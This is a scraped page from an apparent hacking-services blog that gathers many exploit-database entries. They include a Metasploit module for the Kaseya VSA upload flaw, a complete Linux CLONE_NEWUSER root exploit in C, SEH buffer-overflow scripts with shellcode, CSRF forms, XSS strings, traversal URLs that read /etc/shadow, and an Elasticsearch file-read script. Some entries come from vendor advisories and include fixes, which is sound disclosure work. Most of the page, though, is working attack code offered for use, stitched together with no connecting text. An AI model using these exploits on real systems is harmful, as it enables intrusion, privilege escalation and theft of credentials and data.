Source: https://code.google.com/p/google-security-research/issues/detail?id=538
Truecrypt 7 Derived Code/Windows: Drive Letter Symbolic Link Creation EoP
Platform: Windows
Class: Local Elevation of Privilege
Tested on: VeraCrypt 1.13 x86 on Windows 10
Summary:
The Windows driver used by projects derived from Truecrypt 7 (verified in Veracrypt and CipherShed) are vulnerable to a local elevation of privilege attack by abusing the drive letter symbolic link creation facilities to remap the main system drive. With the system drive remapped it’s trivial to get a new process running under the local system account.
Description:
Any user on the system can connect to the Truecrypt device object and mount a new encrypted volume. As part of this process the driver will try and create the requested drive letter by calling IoCreateSymbolicLink. To prevent redefining an existing drive letter a call is made to IsDriveLetterAvailable which attempts to open the link “\DosDevices\X:” for reading, returning FALSE if it was successfully opened. The specific code in src\Driver\Ntdriver.c is:
if (NT_SUCCESS (ZwOpenSymbolicLinkObject (&handle, GENERIC_READ, &objectAttributes)))
{
ZwClose (handle);
return FALSE;
}
return TRUE;
The bug which allows you to bypass this is due to the use of the NT_SUCCESS macro. This means that any error opening the symbolic link will cause the drive letter to be assumed to not exist. If we can cause the open to fail in any way then we can bypass this check and mount the volume over an existing drive letter. This is possible because with terminal services support the \DosDevices path points to a special fake path \?? which first maps to a per-user writable location (under \Sessions\0\DosDevices) before falling back to \GLOBAL??. When the kernel creates a new object under \?? is creates it in the per-user location instead so there’s no conflict with a drive symbolic link in \GLOBAL??. So how to bypass the check? The simplest trick is to just create any other type of object with that name, such as an object directory. This will cause ZwOpenSymbolicLink to fail with STATUS_OBJECT_TYPE_MISMATCH passing the check.
This in itself would only cause problems for the current user if it wasn’t for the fact that there exists a way of replacing the current processes device map directory using the NtSetInformationProcess system call. You can set any object directory to this which allows you DIRECTORY_TRAVERSE privilege, which is pretty much anything. In particular we can set the \GLOBAL?? directory itself. So to exploit this and remap the C: drive to the truecrypt volume we do the following:
1) Set the current process’s device map to a new object directory. Create a new object called C: inside the device map directory.
2) Mount a volume (not using the mount manager) and request the C: drive mapping. The IsDriveLetterAvailable will return TRUE.
3) Wait for the driver to open the volume and at that point delete the fake C: object (if we don’t do this then the creation will fail). While this looks like a race condition (which you can win pretty easily through brute force) you can use things like OPLOCKs to give 100% reliability.
4) The mount will complete writing a new C: symbolic link to the device map.
5) Set the \GLOBAL?? directory as the new process device map directory.
6) Unmount the volume, this calls IoDeleteSymbolicLink with \DosDevices\C: which actually ends up deleting \GLOBAL??\C:
7) Remount the volume as the C: drive again (you’ll obviously need to not use C: when referring to the volume location). The user now has complete control over the contents of C:.
Fixing the Issue:
While technically IsDriveLetterAvailable is at fault I don’t believe fixing it would completely remove the issue. However changing IsDriveLetterAvailable to only return FALSE if STATUS_OBJECT_NAME_NOT_FOUND is returned from the ZwOpenSymbolicLink object would make it a lot harder to bypass the check. Also I don’t know if specifying the use of the mount volume driver would affect this.
The correct fix would be to decide where the symbolic link is supposed to be written to and specify it explicitly. As in if you want to ensure it gets written to the current user’s drive mapping then specify the per-user directory at \Sessions\0\DosDevices\X-Y where X-Y is the authentication ID got from the SeQueryAuthenticationIdToken API. Or if it’s supposed to be in the global drive names then specify \GLOBAL??. Note this probably won’t work on pre-fast user switching versions of XP or Windows 2000 (assuming you’re still willing to support those platforms). Also I’d recommend if going the per-user route then only use the primary token (using PsReferencePrimaryToken) to determine the authentication ID as that avoids any mistakes with impersonation tokens. There’s no reason to believe that this would cause compat issues as I wouldn’t expect the normal user tool to use impersonation to map the drive for another user.
Note this wasn’t reported in the iSec Partners security review so it’s not an missed fix.
Proof of Concept:
I’ve provided a PoC, you’ll need to build it with VS2015. It will change an arbitrary global drive letter to a VeraCrypt volume. Note it only works on VeraCrypt but it might be possible to trivially change to work on any other truecrypt derived products. You MUST build an executable to match the OS bitness otherwise it will not work. To test the PoC use the following steps.
1. Create a veracrypt volume using the normal GUI, the PoC doesn’t do this for you. Don’t mount the volume.
2. Execute the PoC, passing the drive letter you want to replace, the path to the volume file and the password for the file. e.g. MountVeracryptVolume C: c:\path\to\volume.hc password.
3. If all worked as expected eventually the PoC should print Done. At this point the drive letter you specified has been replaced with the truecrypt volume. As long as you have a command prompt open you should be able to see that the C: drive is now pointing at the encrypted volume. You can hit enter to exit the program and unmount the volume, however if you’ve replaced the system drive such as C: this will likely cause the OS to become unusable pretty quickly.
Expected Result:
It shouldn’t be possible to mount the volume over a global drive.
Observed Result:
The global drive specified has been replaced with a link to the encrypted volume.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38403.zip
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863153205
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Kaseya VSA uploader.aspx Arbitrary File Upload',
'Description' => %q{
This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions
between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary
directory leading to arbitrary code execution with IUSR privileges. This module has been
tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.
},
'Author' =>
[
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2015-6922'],
['ZDI', '15-449'],
['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/kaseya-vsa-vuln-2.txt'],
['URL', 'http://seclists.org/bugtraq/2015/Sep/132']
],
'Platform' => 'win',
'Arch' => ARCH_X86,
'Privileged' => false,
'Targets' =>
[
[ 'Kaseya VSA v7 to v9.1', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Sep 23 2015'))
end
def check
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('ConfigTab','uploader.aspx')
})
if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Unknown
end
end
def upload_file(payload, path, filename, session_id)
print_status("#{peer} - Uploading payload to #{path}...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri('ConfigTab', 'uploader.aspx'),
'vars_get' => {
'PathData' => path,
'qqfile' => filename
},
'data' => payload,
'ctype' => 'application/octet-stream',
'cookie' => 'sessionId=' + session_id
})
if res && res.code == 200 && res.body && res.body.to_s.include?('"success": "true"')
return true
else
return false
end
end
def exploit
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('ConfigTab','uploader.aspx')
})
if res && res.code == 302 && res.body && res.body.to_s =~ /mainLogon\.asp\?logout=([0-9]*)/
session_id = $1
else
fail_with(Failure::NoAccess, "#{peer} - Failed to create a valid session")
end
asp_name = "#{rand_text_alpha_lower(8)}.asp"
exe = generate_payload_exe
payload = Msf::Util::EXE.to_exe_asp(exe).to_s
paths = [
# We have to guess the path, so just try the most common directories
'C:\\Kaseya\\WebPages\\',
'C:\\Program Files\\Kaseya\\WebPages\\',
'C:\\Program Files (x86)\\Kaseya\\WebPages\\',
'D:\\Kaseya\\WebPages\\',
'D:\\Program Files\\Kaseya\\WebPages\\',
'D:\\Program Files (x86)\\Kaseya\\WebPages\\',
'E:\\Kaseya\\WebPages\\',
'E:\\Program Files\\Kaseya\\WebPages\\',
'E:\\Program Files (x86)\\Kaseya\\WebPages\\',
]
paths.each do |path|
if upload_file(payload, path, asp_name, session_id)
register_files_for_cleanup(path + asp_name)
print_status("#{peer} - Executing payload #{asp_name}")
send_request_cgi({
'uri' => normalize_uri(asp_name),
'method' => 'GET'
})
# Failure. The request timed out or the server went away.
break if res.nil?
# Success! Triggered the payload, should have a shell incoming
break if res.code == 200
end
end
end
end
# Exploit Title: [AlienVault - ossim CSRF]
# Date: [10-5-2015]
# Exploit Author: [MohamadReza Mohajerani]
# Vendor Homepage: [www.alienvault.com]
# Software Link: [https://www.alienvault.com/products/ossim]
# Version: [Tested on 4.3]
Vulnerability Details:
=====================
Multiple CSRF vectors exists within AlienVault ossim allowing the following
attacks:
1)Delete user accounts(ex.admin account)
2)Delete knowledge DB items
Exploit code(s):
===============
The only thing the attacker needs to do is sending the following link to
the victim via GET request , if the victim authenticated on the ossim and
click on the link the following attacks can be occurred :
1)For deleting the
knowledge DB items just send the link below:
https://ossim-ip/ossim/repository/repository_delete.php?id_document=10232
[id_document is the item number which you want to delete (it starts from 1)]
2)For deleting the user accounts (ex.admin account) use the link below :
https://ossim-ip/ossim/session/deleteuser.php?user=admin&_=1444042812845
[the random number (1444042812845) is not important at all and you can
change the number to whatever you want]
Severity Level:
================
High
'''
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-LANSPY-BUFFER-OVERFLOW-10052015.txt
Vendor:
================================
www.lantricks.com
Product:
================================
LanSpy.exe
LanSpy is network security and port scanner, which allows getting different
information about computer:
Domain and NetBios names, MAC address, Server information, Domain and
Domain controller etc....
Vulnerability Type:
===================
Buffer Overflow
CVE Reference:
==============
N/A
Vulnerability Details:
======================
LanSpy.exe uses an 'addresses.txt' plain text file which lives under the
main LanSpy
directory the file is used to load scanned IPs or URLs
e.g.
127.0.0.1
replace addresses.txt file with our malicious one, the buffer overflow
payload must
be the very first entry in the text file. Next, run LanSpy.exe and click
green arrow
or use keyboard press 'F3' to start. Then KABOOM!... program crashez and we
will control
EIP at 684 bytes also overwrite both the NSEH & SEH exception handler
pointers...
Quick stack dump...
(1274.19c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0264fb41 ebx=00418d7c ecx=0264fe84 edx=00000000 esi=00000000
edi=00000000
eip=41414141 esp=0264fe8c ebp=41414141 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
41414141 ?? ???
0:001> g
(1274.19c4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=52525252 edx=7714b4ad esi=00000000
edi=00000000
eip=52525252 esp=0264f8f0 ebp=0264f910 iopl=0 nv up ei pl zr na pe
nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
efl=00010246
52525252 ?? ???
0:001> !exchain
0264f904: ntdll!LdrRemoveLoadAsDataTable+d64 (7714b4ad)
0264fe8c: 52525252
Invalid exception stack at 42424242
POC code(s):
=============
'''
import os
#LanSpy.exe buffer overflow POC
#by hyp3rlinx
#hyp3rlinx.altervista.org
#=============================
#LanSpy.exe uses an 'addresses.txt' text file
#which lives under the LanSpy directory
#the addresses.txt file is used to load scanned IPs or URLs
#control EIP at 684 bytes... also overwrite
#both the NSEH & SEH exception handler pointers
#-----------------------------------------------
payload="A"*684+"BBBB"+"RRRR" #<------- KABOOOOOOOOOOOOOOOOOOM!
file=open("C:\\Program Files (x86)\\LanTricks\\LanSpy\\addresses.txt", "w")
file.write(payload)
file.close()
'''
Public Disclosure:
===================
October 5, 2015
Exploitation Technique:
=======================
Local
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
'''
Exploit Title: ManageEngine ServiceDesk Plus <= 9.1 build 9110 - Path
Traversal
Product: ManageEngine ServiceDesk Plus
Vulnerable Versions: 9.1 build 9110 and previous versions
Tested Version: 9.1 build 9110 (Windows)
Advisory Publication: 03/10/2015
Vulnerability Type: Unauthenticated Path Traversal
Credit: xistence <xistence[at]0x90.nl>
Product Description
-------------------
ServiceDesk Plus is an ITIL ready IT help desk software for organizations
of all sizes. With advanced ITSM functionality and easy-to-use capability,
ServiceDesk Plus helps IT support teams deliver world-class services to end
users with reduced costs and complexity. Over 100,000 organizations across
185 countries trust ServiceDesk Plus to optimize IT service desk
performance and achieve high user satisfaction.
Vulnerability Details
---------------------
The "fName" parameter is vulnerable to path traversal without the need for
any authentication.
On Windows environments, downloading files will be done with SYSTEM
privileges. This makes it possible to download any file on the filesystem.
The following example will download the "win.ini" file:
$ curl "
http://192.168.2.129:8080/workorder/FileDownload.jsp?module=support&fName=..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
"
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
Solution
--------
Upgrade to ServiceDesk 9.1 build 9111.
Advisory Timeline
-----------------
07/10/2015 - Discovery and vendor notification
07/10/2015 - ManageEngine responsed that they will notify their development
team
09/13/2015 - No response from vendor yet, asked for status update
09/24/2015 - ManageEngine responded that they've fixed the issue and
assigned issue ID: SD-60283
09/28/2015 - Fixed ServiceDesk Plus version 9.1 build 9111 has been released
10/03/2015 - Public disclosure
source: https://www.securityfocus.com/bid/58624/info
BlazeVideo HDTV Player Standard is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed exploit attempts may result in a denial-of-service condition.
BlazeVideo HDTV Player Standard 6.6.0.2 is vulnerable; other versions may also be affected.
# Exploit Title:BlazeVideo HDTV Player Standard 6.6.0.2 SEH Buffer Overflow
# Date: 19-03-2013
# Exploit Author: metacom
# RST
# Vendor Homepage: http://www.blazevideo.com/hdtv-player/
# Download version 6.6.0.2: www.blazevideo.com/download.php?product=blazevideo-hdtv-std
# Version: BlazeVideo HDTV Player Standard 6.6.0.2
# Tested on: Windows 7 German
filename="poc.PLF"
junk = "http://"+ "\x41" * 601
nseh = "\xEB\x06\x90\x90"
seh = "\x5F\x17\x60\x61" #6160175F \EPG.dll
nops = "\x90" * 20
#windows/exec CMD=calc.exe bad \x00\x0a\x1a
shellcode= ("\xb8\xaf\x8c\x07\x94\xda\xcd\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
"\x33\x31\x42\x12\x83\xea\xfc\x03\xed\x82\xe5\x61\x0d\x72\x60"
"\x89\xed\x83\x13\x03\x08\xb2\x01\x77\x59\xe7\x95\xf3\x0f\x04"
"\x5d\x51\xbb\x9f\x13\x7e\xcc\x28\x99\x58\xe3\xa9\x2f\x65\xaf"
"\x6a\x31\x19\xad\xbe\x91\x20\x7e\xb3\xd0\x65\x62\x3c\x80\x3e"
"\xe9\xef\x35\x4a\xaf\x33\x37\x9c\xa4\x0c\x4f\x99\x7a\xf8\xe5"
"\xa0\xaa\x51\x71\xea\x52\xd9\xdd\xcb\x63\x0e\x3e\x37\x2a\x3b"
"\xf5\xc3\xad\xed\xc7\x2c\x9c\xd1\x84\x12\x11\xdc\xd5\x53\x95"
"\x3f\xa0\xaf\xe6\xc2\xb3\x6b\x95\x18\x31\x6e\x3d\xea\xe1\x4a"
"\xbc\x3f\x77\x18\xb2\xf4\xf3\x46\xd6\x0b\xd7\xfc\xe2\x80\xd6"
"\xd2\x63\xd2\xfc\xf6\x28\x80\x9d\xaf\x94\x67\xa1\xb0\x70\xd7"
"\x07\xba\x92\x0c\x31\xe1\xf8\xd3\xb3\x9f\x45\xd3\xcb\x9f\xe5"
"\xbc\xfa\x14\x6a\xba\x02\xff\xcf\x34\x49\xa2\x79\xdd\x14\x36"
"\x38\x80\xa6\xec\x7e\xbd\x24\x05\xfe\x3a\x34\x6c\xfb\x07\xf2"
"\x9c\x71\x17\x97\xa2\x26\x18\xb2\xc0\xa9\x8a\x5e\x29\x4c\x2b"
"\xc4\x35")
f = open(filename,"wb")
f.write(junk+nseh+seh+nops+shellcode)
f.close()
print("Finish")
source: https://www.securityfocus.com/bid/58599/info
The Occasions plugin for WordPress is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests.
Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
Occasions 1.0.4 is vulnerable; other versions may also be affected.
<html> <head><title>CSRF Occasions</title></head> <body> <!-- www.example.com:9001/wordpress --> <form action="http://127.0.0.1:9001/wordpress/wp-admin/options-general.php?page=occasions/occasions.php" method="POST"> <input type="hidden" name="action" value="saveoccasions" /> <input type="hidden" name="nodes[]" value="1" /> <input type="hidden" name="occ_title1" value="CSRF Vulnerability" /> <input type="hidden" name="occ_startdate1" value="18.03." /> <input type="hidden" name="occ_enddate1" value="28.03." /> <input type="hidden" name="occ_type1" value="1" /> <input type="hidden" name="occ_content1" value="<script>alert(1)</script>" /> <script>document.forms[0].submit();</script> </form> </body> </html>
source: https://www.securityfocus.com/bid/58511/info
MySQL and MariaDB are prone to a denial-of-service vulnerability.
An attacker can exploit this issue to crash the database, denying access to legitimate users.
"select astext(0x0100000000030000000100000000000010);"
source: https://www.securityfocus.com/bid/58508/info
Petite Annonce is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/[path]/annonce/moteur-prix.php?categoriemoteur=1"><script>alert(31337);</script>
source: https://www.securityfocus.com/bid/58476/info
Cisco Video Surveillance Operations Manager is prone to multiple security vulnerabilities, including:
1. Multiple local file-include vulnerabilities
2. A security-bypass vulnerability
3. Multiple cross-site scripting vulnerabilities
An attacker may leverage these issues to bypass certain security restrictions to perform unauthorized actions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the affected application.
Cisco Video Surveillance Operations Manager 6.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/"/title><script>alert("ciscoxss");</script>
/*
source: https://www.securityfocus.com/bid/58478/info
Linux kernel is prone to a local privilege-escalation vulnerability.
Local attackers can exploit this issue to gain kernel privileges, which will aid in further attacks.
*/
/* clown-newuser.c -- CLONE_NEWUSER kernel root PoC
*
* Dedicated to: Locke Locke Locke Locke Locke Locke Locke!
*
* This exploit was made on the 13.3.13.
*
* (C) 2013 Sebastian Krahmer
*
* We are so 90's, but we do 2013 xSports.
*
* Must be compiled static:
*
* stealth@linux-czfh:~> cc -Wall clown-newuser.c -static
* stealth@linux-czfh:~> ./a.out
* [**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer
*
* [+] Found myself: '/home/stealth/a.out'
* [*] Parent waiting for boomsh to appear ...
* [*] Setting up chroot ...
* [+] Done.
* [*] Cloning evil child ...
* [+] Done.
* [*] Creating UID mapping ...
* [+] Done.
* [+] Yay! euid=0 uid=1000
* linux-czfh:/home/stealth # grep bin /etc/shadow
* bin:*:15288::::::
* linux-czfh:/home/stealth #
*
*/
#define _GNU_SOURCE
#include <sched.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <errno.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/wait.h>
int go[2];
char child_stack[1<<20];
extern char **environ;
void die(const char *msg)
{
perror(msg);
exit(errno);
}
int child(void *arg)
{
char c;
close(go[1]);
read(go[0], &c, 1);
setuid(0);
/* this will also affect the parent, but the parent
* has the init_user_ns, so it will start suid with real uid 0.
*/
if (chdir("chroot") < 0)
die("[-] chdir");
if (chroot(".") < 0)
die("[-] chroot");
return 0;
}
int setup_chroot(const char *me)
{
mkdir("chroot", 0755);
mkdir("chroot/lib64", 0755);
mkdir("chroot/bin", 0755);
if (link(me, "chroot/lib64/ld-linux-x86-64.so.2") < 0)
die("[-] link");
if (link("/bin/su", "chroot/bin/su") < 0)
die("[-] link");
return 0;
}
int main(int argc, char *argv[])
{
char *su[] = {"/bin/su", NULL};
char *sh[] = {"/bin/bash", NULL};
char me[256], *mee[] = {me, "1", NULL};
char uidmap[128], map_file[128];
pid_t pid;
struct stat st;
int fd;
if (geteuid() == 0 && argc == 1) {
/* this will run inside chroot, started as the ld.so from
* su process
*/
printf("[+] Yay! euid=%d uid=%d\n", geteuid(), getuid());
chown("lib64/ld-linux-x86-64.so.2", 0, 0);
chmod("lib64/ld-linux-x86-64.so.2", 04755);
exit(0);
} else if (geteuid() == 0) {
/* this will run outside */
setuid(0);
execve(*sh, sh, environ);
die("[-] execve");
}
printf("[**] clown-newuser -- CLONE_NEWUSER local root (C) 2013 Sebastian Krahmer\n\n");
memset(me, 0, sizeof(me));
readlink("/proc/self/exe", me, sizeof(me) - 1);
printf("[+] Found myself: '%s'\n", me);
if (fork() > 0) {
printf("[*] Parent waiting for boomsh to appear ...\n");
for (;;) {
stat(me, &st);
if (st.st_uid == 0)
break;
usleep(1000);
}
execve(me, mee, environ);
die("[-] execve");
}
printf("[*] Setting up chroot ...\n");
setup_chroot(me);
printf("[+] Done.\n[*] Cloning evil child ...\n");
if (pipe(go) < 0)
die("[-] pipe");
pid = clone(child, child_stack + sizeof(child_stack),
CLONE_NEWUSER|CLONE_FS|SIGCHLD, NULL);
if (pid == -1)
die("[-] clone");
printf("[+] Done.\n[*] Creating UID mapping ...\n");
snprintf(map_file, sizeof(map_file), "/proc/%d/uid_map", pid);
if ((fd = open(map_file, O_RDWR)) < 0)
die("[-] open");
snprintf(uidmap, sizeof(uidmap), "0 %d 1\n", getuid());
if (write(fd, uidmap, strlen(uidmap)) < 0)
die("[-] write");
close(fd);
printf("[+] Done.\n");
close(go[0]);
write(go[1], "X", 1);
waitpid(pid, NULL, 0);
execve(*su, su, NULL);
die("[-] execve");
return -1;
}
source: https://www.securityfocus.com/bid/58463/info
QlikView is prone to a remote integer-overflow vulnerability.
Successful attacks will allow attackers to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
QlikView 11.00 SR2 is vulnerable; other versions may also be affected.
Vulnerability details:
----------------------
The .qvw file is divided into several sections with a specified delimiter.
Among others, there is a parameter which is responsible for defining the
section length. On the hex listing below it's the DWORD A4 00 00 00 (address
315EF)
000315B0: 00 00 01 00-00 00 0E 23-23 23 23 23-23 23 23 23
000315C0: 23 23 23 23-23 01 2E 00-00 00 00 00-00 00 00 00
000315D0: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 00 03
000315E0: 00 00 00 00-00 00 00 90-02 00 00 00-00 04 00 A4
000315F0: 00 00 00 78-9C 3D CC CB-4A 02 50 14-86 D1 1F 47
If by any reasons the value is bigger than the actual size of the section,
an error is handled by a C++ EH and a message "Document failed to load" is
shown. The check condition can be seen here:
.text:00D6BD66 mov eax, [edi+28h]
.text:00D6BD69 mov ebx, [eax] ; here is the length parameter
.text:00D6BD6B add eax, 4
.text:00D6BD6E mov [edi+28h], eax
.text:00D6BD71 cmp ebx, [ebp+var_14]
.text:00D6BD74 jg loc_D6BBAC ; check if the parameter value
is bigger than actual length
However, the comparison operates with a signed number and doesn't check if it's
less than zero. In other words, if an attacker supplies a DWORD bigger than
0x80000000, the jump will not be taken (as the number will be considered as
negative), causing an integer overflow. After that, the length parameter is used
as the DstSize argument to the CArchive::Read function:
.text:00D6BD7A mov eax, [ebp+Dst]
.text:00D6BD7D push ebx ; DstSize
.text:00D6BD7E push eax ; Dst
.text:00D6BD7F mov ecx, edi
.text:00D6BD81 call ?Read () CArchive@@QAEIPAXI () Z ; CArchive::Read(void *,uint)
A large amount of data is read. It is used later to fill the created Archive
whose size is 0x8000:
.text:00B26207 push 0
.text:00B26209 push 8000h
.text:00B2620E push 1
.text:00B26210 lea eax, [ebp+var_60]
.text:00B26213 push eax
.text:00B26214 lea ecx, [ebp+var_A8]
.text:00B2621A call ??0CArchive@@QAE () PAVCFile@@IHPAX () Z ;
CArchive::CArchive(CFile *,uint,int,void *)
This results in the controlled address being overwritten with the controlled
value.
.text:009F3092 mov ecx, [esi]
.text:009F3094 mov edx, [esi+4]
.text:009F3097 mov [ecx+4], edx ; here the error occurs;
.text:009F3097 ; trying to write at non-existing address
An extract from a debugger with the occurence of the error is presented below.
eax=04735f14 ebx=00000000 ecx=bbbbbbb7 edx=aaaaaaa6 esi=04b2fbc0 edi=04735f10
eip=01723097 esp=003527f8 ebp=00352818 iopl=0 nv up ei pl nz ac pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010216
Qv+0x5f3097:
01723097 895104 mov dword ptr [ecx+4],edx ds:002b:bbbbbbbb=????????
source: https://www.securityfocus.com/bid/58450/info
fastreader is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
fastreader 1.0.8 is affected; other versions may also be vulnerable.
The following example URI is available:
http://www.g;id;.com
source: https://www.securityfocus.com/bid/58432/info
PHPBoost is prone to an information disclosure vulnerability and an arbitrary file-upload vulnerability because the application fails to adequately sanitize user-supplied input.
An attacker can exploit these issues to upload arbitrary files in the context of the web server process or gain access to sensitive information that may aid in further attacks.
PHPBoost 4.0 is vulnerable; other versions may also be affected.
http://www.example.com/phpboost/user/?url=/../../KedAns
Source: https://code.google.com/p/google-security-research/issues/detail?id=546
Avast will render the commonName of X.509 certificates into an HTMLLayout frame when your MITM proxy detects a bad signature. Unbelievably, this means CN="<h1>really?!?!?</h1>" actually works, and is pretty simple to convert into remote code execution.
To verify this bug, I've attached a demo certificate for you. Please find attached key.pem, cert.pem and cert.der. Run this command to serve it from a machine with openssl:
$ sudo openssl s_server -key key.pem -cert cert.pem -accept 443
Then visit that https server from a machine with Avast installed. Click the message that appears to demonstrate launching calc.exe.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38384.zip
source: https://www.securityfocus.com/bid/58431/info
KindEditor is prone to multiple remote file-upload vulnerabilities because it fails to sufficiently sanitize user-supplied input.
Attackers can exploit these issues to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
KindEditor 4.1.5 is vulnerable; other versions may also be affected.
<?php
$uploadfile="KedAns.txt";
$ch = curl_init("http://www.example.com/kindeditor/php/upload_json.php?dir=file");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# KindEditor (ASP,ASP.NET,JSP,PHP) _JSON Uploader :
--------------------------------------------------
<html><head>
<title>Uploader By KedAns-Dz</title>
<script src="http://www.example.com/kindeditor/kindeditor-min.js"></script>
<script>
KindEditor.ready(function(K) {
var uploadbutton = K.uploadbutton({
button : K('#uploadButton')[0],
fieldName : 'imgFile',
url : 'http://www.example.com/kindeditor/php/upload_json.asp?dir=file',
afterUpload : function(data) {
if (data.error === 0) {
var url = K.formatUrl(data.url, 'absolute');
K('#url').val(url);}
},
});
uploadbutton.fileBox.change(function(e) {
uploadbutton.submit();
});
});
</script></head><body>
<div class="upload">
<input class="ke-input-text" type="text" id="url" value="" readonly="readonly" />
<input type="button" id="uploadButton" value="Upload" />
</div>
</body>
</html>
# elasticpwn Script for ElasticSearch url path traversal vuln. CVE-2015-5531
```
[crg@fogheaven elasticpwn]$ python CVE-2015-5531.py exploitlab.int /etc/hosts
!dSR script for CVE-2015-5531
127.0.0.1 localhost
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
The script requires path.repo to be set into elasticsearch.yml and be writeable by elasticsearch process.
In order to bypass the snapshot- prefix setted in the server side, we need to create a known relative path:
curl http://exploitlab.int:9200/_snapshot/?pretty
{
"pwn" : {
"type" : "fs",
"settings" : {
"location" : "dsr"
}
},
"pwnie" : {
"type" : "fs",
"settings" : {
"location" : "dsr/snapshot-ev1l"
}
}
}
We will use it later to access through path traversal url:
trav = 'ev1l%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..'
The file content it's represented as an array of ints, that needs to be translated into human readable:
crg@exploitlab:~$ python elk-5531.py localhost /etc/issue
!dSR script for CVE-2015-5531
{u'status': 400, u'error': u'ElasticsearchParseException[Failed to derive xcontent from (offset=0, length=26): [85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10]]'}
[85, 98, 117, 110, 116, 117, 32, 49, 50, 46, 48, 52, 46, 53, 32, 76, 84, 83, 32, 92, 110, 32, 92, 108, 10, 10] = Ubuntu 12.04.5 LTS \n \l
